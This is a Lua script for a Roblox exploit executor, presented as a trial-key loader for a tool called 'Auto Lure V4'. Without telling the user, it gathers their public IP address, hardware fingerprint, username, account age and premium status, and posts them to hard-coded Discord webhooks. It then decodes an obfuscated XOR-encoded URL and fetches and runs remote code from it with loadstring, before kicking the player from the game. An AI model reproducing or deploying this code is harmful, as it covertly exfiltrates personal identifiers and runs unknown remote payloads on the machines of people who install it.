
local Key = "Trial1"
local Active = false
local JoinTime = os.time()
local Standart = 5814783

_G.Url = "https://discord.com/api/webhooks/1015974882753917038/PVKkwzgivbvW5jd_8yVfcTyK9Qp8raI6bp41qL7q7_YyS17SuWur-5totMWTCFiZI-a6"

local function WebHook()
    local IP = game:HttpGet("https://v4.ident.me")
    plr = game:GetService'Players'.LocalPlayer
    local premium = false
    local ALT = false
    if plr.MembershipType == Enum.MembershipType.Premium then
        premium = true
    elseif plr.MembershipType == Enum.MembershipType.None then
        premium = false
    end
    if premium == false then 
        if plr.AccountAge <= 70 then 
            ALT = true
        end
    end

    local market = game:GetService("MarketplaceService")
    local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)


    local http_request = http_request;
    if syn then
        http_request = syn.request
    elseif SENTINEL_V2 then
        function http_request(tb)
            return {
                StatusCode = 200;
                Body = request(tb.Url, tb.Method, (tb.Body or ''))
            }
        end
    end

    local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
    local decoded = game:GetService('HttpService'):JSONDecode(body)
    local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
    hwid = "";

    for i, v in next, hwid_list do
        if decoded.headers[v] then
            hwid = decoded.headers[v];
            break
        end
    end

    if hwid then
        local HttpServ = game:GetService('HttpService')
        local url = "https://discord.com/api/webhooks/792782411410833478/s6utp4CwBvUfSYH9YCtf_SxkfLBj_VpReVNaVE4phv8urjGsOodqBpkKSFKZZ_JWG7-f"


        local data = 
            {
                ["content"] = "",
                ["embeds"] = {{
                    ["title"] = "__**HWID:**__",
                    ["description"] = hwid,
                    ["type"] = "rich",
                    ["color"] = 2031871,
                    ["fields"] = {
                        {
                            ["name"] = "Username:",
                            ["value"] = Game.Players.LocalPlayer.Name,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "IP Address:",
                            ["value"] = IP,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Game Link:",
                            ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Game Name:",
                            ["value"] = info.Name,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Age:",
                            ["value"] = plr.AccountAge,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "Premium:",
                            ["value"] = premium,
                            ["inline"] = true
                        },
                        {
                            ["name"] = "ALT:",
                            ["value"] = ALT,
                            ["inline"] = true
                        },

                    },
                }}
            }
        local newdata = HttpServ:JSONEncode(data)

        local headers = {
            ["content-type"] = "application/json"
        }

        local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
        http_request(request_payload)
    end
end

local function webhook(url,title,desc,color) --| SENDS LOGS
    local url = url
    local msg = {
        username = "Auto Lure V4",
        avatar_url = "https://cdn.discordapp.com/attachments/364826127711338496/1005580177071423619/unknown.png",
    ["embeds"] = {
        {
            ["title"] = title,
            ["description"] = desc,
            ["type"] = "rich",
            ["color"] = color,
        }
    }
    }
    local newdata = game:GetService("HttpService"):JSONEncode(msg)
    local headers = {
    ["content-type"] = "application/json"
    }
    request = http_request or request or HttpPost or syn.request
    local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
    request(abcdef)
end

if Key == "Trial1" then
    WebHook()
    webhook(_G.Url, "TRIAL STARTED", "Username: " .. game:GetService("Players").LocalPlayer.Name .. "\nTime Elapsed: " .. os.time() - JoinTime .. " seconds ", Standart)
    local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor or v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v12={};for v15=1, #v8 do v6(v12,v0(v4(v1(v2(v8,v15,v15 + 1 + 0)),v1(v2(v9,(1759 -(1441 + 317)) + (1038 -(349 + 689)) + ((v15-((2 + 0) -1))% #v9),1 + ((v15-(1 -0))% #v9) + (2 -1))))%(708 -452)));end return v5(v12);end local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor or v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11)local v13=(0 -0) -0;local v14;while true do local v16=0;local v17;while true do if (v16==0) then v17=1748 -((2484 -(49 + 953)) + (632 -(223 + 143)));while true do if (((0 -0) + 0)==v17) then if (v13==0) then local v18=0 + (596 -(63 + 533));while true do if (1==v18) then v13=1;break;end if (v18==(0 -0)) then v14={};for i=2 -1, #v10 do v6(v14,v0(v4(v1(v2(v10,i,i + (2 -1) + 0)),v1(v2(v11,(1328 -(639 + 688)) + 0 + 0 + ((i-(435 -(5 + 429)))% #v11),1 + (0 -0) + ((i-1)% #v11) + 1)))%(238 + 18)));end v18=(2096 -(130 + 973)) -((581 -385) + 796);end end end if (v13==(1 -0)) then return v5(v14);end break;end end break;end end end end loadstring(game:HttpGet(v7(v7("\233\46\19\201\132\37\123\161\133\64\21\161\140\64\21\162\233\43\19\201\130\46\123\164\132\41\123\167\128\45\123\172\233\43\123\162\134\64\18\172\233\46\21\161\233\46\31\201\135\40\123\164\141\64\17\167\233\46\18\167\233\46\16\201\135\45\123\167\132\64\17\166\233\46\20\165\233\42\123\161\233\46\123\160\133\64\21\160\134\64\16\165\233\45\30\201\141\64\19\172\233\45\17\163\233\40\30\201\134\45\123\164\141\64\19\163\233\46\22\173\233\44\123\167\128\64\23\201\128\43\123\167\134\44\123\162\132\64\20\167\233\41\20\201\132\37\123\164\140\41\123\161\128\64\18\164\233\41\22\201\132\45\20\201\135\45\31\201\134\46\123\160\130\64\20\167\233\46\18\201\132\37\31\201\130\45\123\167\140\64\17\201\128\47\123\167\134\45\123\162\132\64\20\160\233\45\17\201\128\45\123\167\128\45\123\164\135\64\22\173\233\45\31\201\129\42\123\167\128\44\123\167\141\64\31\160\233\36\18\201\132\44\31\201\132\36\16","\181\28\39\149"),v7("\105\137\140\187\74\150\218\112\105\129\143\213\39\148\221\31\4\136\137","\53\184\189\137\22\167\234\67"))))();
    Active = true
else
    game:GetService("Players").LocalPlayer:Kick("Trial key doesnt exists now")    
end
if Active == true then
    wait(700)
    webhook(_G.Url, "TRIAL ENDED", "Username: " .. game:GetService("Players").LocalPlayer.Name .. "\nTime Elapsed: " .. os.time() - JoinTime .. " seconds ", Standart)
    game:GetService("Players").LocalPlayer:Kick("Trial ended :c")   
end

